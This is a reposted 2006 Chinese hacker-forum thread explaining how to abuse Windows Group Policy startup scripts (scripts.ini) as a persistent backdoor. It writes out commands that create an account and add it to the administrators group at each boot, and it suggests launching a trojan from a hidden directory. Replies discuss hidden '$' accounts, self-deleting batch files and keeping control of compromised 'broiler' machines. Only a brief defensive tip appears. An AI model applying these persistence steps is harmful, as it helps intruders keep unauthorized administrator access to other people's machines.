[转载]启动后门的一个思路
文章作者:OnlyVeR信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
组策略启动脚本;
利用过程:启动组策略(运行->gpedit.msc->计算机配置->Windows 设置->脚本(启动/关机) )
启动与关机相关设置;
选择启动->属性->添加 会弹出选择脚本名
选择程序 C:\windows\system32\net.exe 参数 user admin /add 来执行 net user admin /add
再同样添加C:\Windows\system32\net.exe localgroup administrators admin /add
来执行 net localgroup administrators admin /add
{ .老鸟跑出来say:TMD这都是费话,net user早懂了 砰的一声 (PS:我脑袋被拍个包来了) }
费话少说: 在经过进一步了解的时候发现这里是由
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\[b]scripts.ini[/b]
(PS:默认是隐藏的.) 来控制 shutdown 和 Startup 的.
[b]ini组成方式如下[/b]
------------------------------
[Startup]
0CmdLine=C:\WINDOWS\system32\net.exe
0Parameters=user admin /add
1CmdLine=C:\WINDOWS\system32\net.exe
1Parameters=localgroup administrators admin /add
[Shutdown]
0CmdLine=1.bat
0Parameters=
[startup][color=blue] \\代表是启动[/color]
0CmdLine=C:\WINDOWS\system32\net.exe[color=blue] \\脚本名[/color]
0Parameters=user admin /add [color=blue]\\脚本参数[/color]
1CmdLine=C:\WINDOWS\system32\net.exe[color=blue] \\第二条脚本名[/color]
1Parameters=localgroup administrators admin /add [color=blue]\\第二条脚本参数[/color]
[Shutdown] [color=blue]\\关闭 (。。我再来一句,倒塌.还没说完又被砖给拍了下.)[/color]
0CmdLine=1.bat [color=blue]\\脚本名 1.bat 目录队应于 C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup[/color]
0Parameters= \\参数
------------------------------
也就是说 [b]scripts.ini [/b] 控制着整个启动. 就如同以前 win.ini 一样
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup\ 启动文件的目录,那样脚本名路径就可以不用加详细目录名了.
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\shutdown\ 关闭文件目录, 同上.
思路就这样. copy 后门到非常隐藏的目录 再加个启动脚本参数 实现木马启动.
解决此缺陷的方法: 组策略->计算机配置->管理模板->系统->脚本 相应的禁止就行了.
或者来招毒的 彻底禁止掉这个: 把scripts.ini 对应用户权限全部删除 system administrators 全部取消. 就没人能访问了.
以上在 Windows XP SP2 均已测试成功; 文章写得菜. 希望大虾们斧正. 可以拿到C:\WINDOWS\system32权限,启动脚本还有什么意义?开启3389?好像比介绍的这个档次低了些. [quote][b]这里是引用第[/b][color=#ff0000][1 楼][/color][b]的[color=#000066]mtryer[/color]于[/b]2006-03-18 21:17[b]发表的:[/b]
可以拿到C:WINDOWSsystem32权限,启动脚本还有什么意义?开启3389?好像比介绍的这个档次低了些.[/quote]
像普通的一些后门 都是修改注册表Run子键 来启动自己; 或者加入启动. 在MSconfig 或者 一些工具 一查就能轻易干掉;
而这个脚本启动 一些工具可能就无法查到!@
To mtryer [b]哪些后门执行不需要administrator权限吖?? [/b]
开启3389 一些机器开启3389有意义嘛? 丢个反弹后门更实际; 比如我已经获得了一台服务器的权限, 就在那里面加个脚本,
net user XX$ /add &localgroup administrators xx$ /add 每次启动的时候执行用户的操作, 而当一些XX管理员维护的时候.
肉鸡就不会那么容易飞; (PS:那个在用户后面加个$号, 应该用户名不会在登陆或net user时显示吧) 在开机或者关机的时候,会有相应提示 正在执行开机/关机脚本,过于明显 [quote][b]这里是引用第[/b][color=#ff0000][3 楼][/color][b]的[color=#000066]pezma[/color]于[/b]2006-03-18 22:03[b]发表的:[/b]
在开机或者关机的时候,会有相应提示 正在执行开机/关机脚本,过于明显[/quote]
Windows XP SP2 下测试 未有相应提示! 设脚本有人用过,写到那个ini文件,倒是方便不少.不错的方法.
就是不想放弃那些win98用户,网吧还是大批. 不错,这个思路没人提过,anyway,思路是最重要的! 嗯,哈,去年这种方法我玩过,而且也做过实验~
当初我的实验是在想,机器完全启动后是中木马呢,还是木马启动到登陆界面(就是让输入密码那一块)启动,事实证明是完全启动后才中了,为了实验那玩意,误改了userinit.exe那个注册表的键值,还得重装系统~~ [s:55] [s:55] [s:70] 8错的丝路....感觉蛮好玩的..要是服务器开了3389用这方法写的脚本..哈哈..管理员就算删了自己建的用户也可以让自动添加.... 噢?原创啊?这种原创貌似很无聊。
[url]http://www.baidu.com/s?tn=gosurfbrowserdg&ie=gb2312&bs=%CC%E1%C9%FD%B9%DC%C0%ED%D4%B1%C8%A8%CF%DE8%B7%A8&sr=&z=&cl=3&f=8&wd=%CC%E1%C9%FD%B9%DC%C0%ED%D4%B1%C8%A8%CF%DE%3A%C6%F4%B6%AF%BD%C5%B1%BE%B7%A8++&ct=0[/url] 发现在删除 C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\scripts.ini
或者 更改里面的内容; 机器在启动的时候 还是会照样添加用户和执行启动脚本.
猜测可能是写注册表或者其他的;
TO 我又忘密码了;
在此文章未写出来的时候. 你重视过其内容嘛?
文章的确是无聊, 多谢提点(以后会注意的, THK.) 真麻烦 有时候我是把那些非系统服务的服务主程序捆绑后门…… [quote][b]这里是引用第[/b][color=#ff0000][10 楼][/color][b]的[color=#000066]only_over[/color]于[/b]2006-03-20 11:51[b]发表的:[/b]
发现在删除 C:WINDOWSsystem32GroupPolicyMachineScriptsscripts.ini
或者 更改里面的内容; 机器在启动的时候 还是会照样添加用户和执行启动脚本.
猜测可能是写注册表或者其他的;
TO 我又忘密码了;
.......[/quote]
我支持"我又忘记密码了"
其实楼主的这个只是改动了一下这文章,我认为不是原创,这文章我仔细的看了
[url]http://www.baidu.com/s?tn=gosurfbrowserdg&ie=gb2312&bs=%CC%E1%C9%FD%B9%DC%C0%ED%D4%B1%C8%A8%CF%DE8%B7%A8&sr=&z=&cl=3&f=8&wd=%CC%E1%C9%FD%B9%DC%C0%ED%D4%B1%C8%A8%CF%DE%3A%C6%F4%B6%AF%BD%C5%B1%BE%B7%A8++&ct=0[/url] [s:38] 大哥,这个东西在黑防早说了 [s:64] 像这样修改的启动方式
应该不会那么容易被查出来吧~N [quote][b]这里是引用第[/b][color=#ff0000][10 楼][/color][b]的[color=#000066]only_over[/color]于[/b]2006-03-20 11:51[b]发表的:[/b]
发现在删除 C:WINDOWSsystem32GroupPolicyMachineScriptsscripts.ini
或者 更改里面的内容; 机器在启动的时候 还是会照样添加用户和执行启动脚本.
猜测可能是写注册表或者其他的;
.......[/quote]
这个很有意思,没有测试,有心情了自己测试测试,
不妨把建立隐藏账户,开启 启动脚本 (防止有的人禁止了开机脚本),配置脚本等弄成一条龙,搞一个bat什么的,方便运行。在做一个自删除。有心情了弄弄阿,很有意思的。
[color=red]另外,个人声明:我相信这篇文章是only_over自己领悟出来的[/color]。
虽然和一些文章有一些暗合。如果仅仅就开机脚本问题来说,上面的几个朋友提供的文章仍然不是最早的。我记得这里原来还有文章提到批判guest权限不能运行组策略,添加开机脚本,这是对的。不过其实那个作者的意思也许是,获得权限之后添加开机脚本。添加开机脚本的意义,正如only_over 2楼 所说。是获得权限后的一个为了保住权限的行为。 [quote][b]这里是引用第[/b][color=#ff0000][15 楼][/color][b]的[color=#000066]金州[/color]于[/b]2006-03-22 04:06[b]发表的:[/b]
这个很有意思,没有测试,有心情了自己测试测试,
不妨把建立隐藏账户,开启 启动脚本 (防止有的人禁止了开机脚本),配置脚本等弄成一条龙,搞一个bat什么的,方便运行。在做一个自删除。有心情了弄弄阿,很有意思的。
[color=red]另外,个人声明:我相信这篇文章是only_over自己领悟出来的[/color]。
.......[/quote]
如此贴是外人发的您还会这么说吗? [s:44] [quote][b]这里是引用第[/b][color=#ff0000][16 楼][/color][b]的[color=#000066]我又忘密码了[/color]于[/b]2006-03-22 08:43[b]发表的:[/b]
如此贴是外人发的您还会这么说吗? [s:44][/quote]
如果是外人发的,我就不会那么说了,哈哈
因为恰恰是和only_over有一点接触,觉得哥们不会无聊到拿着别人的这么点东西给自己脸上贴金
再说他已经金光闪闪了。哈哈
[color=red]这种基础类的研究每个人多有每个人的看法,有深有浅,方法和角度不同。
每个思路的实现也有一些差异变化。
所以觉得不应该简单的指责为抄袭[/color]。
朋友提供另外一篇文章,也是八进制的swords写得。本论坛就有。
[s:66] [s:66] [s:66] [s:66] [b]TO 金州(老州电视台 台长)[/b]
Tanks; 其实没必要争的,争来争去,浪费时间; 这个是我某天在调试机器的时候运行组策略. 乱选看到了Windows设置/(开机/关机脚本) 就跑去胡乱捣鼓了下, 设定 net.exe 执行 net user admin /add 起初都没怎么重视, 第二天开机的时候就发现被添加了个admin的用户.就跟着研究下了; 结果就是这篇文章;
[b]TO ALL[/b]
12和9楼所提出的文章; 我一直没注意过,;
看到前辈写出来的文章,心里感到惊慌失措; 不知道什么时候才能像他们一样;
[b][color=red]PS: 偶和金州不过是普通(不知道怎么说那关系,暂用XXXX代替) 志同道合的朋友而已; 他并不是刻意袒护我;
在此说声:Sorry . 浪费大家的时间来看这篇过时而又重复的垃圾鸟文了[/color][/b]
页:
[1]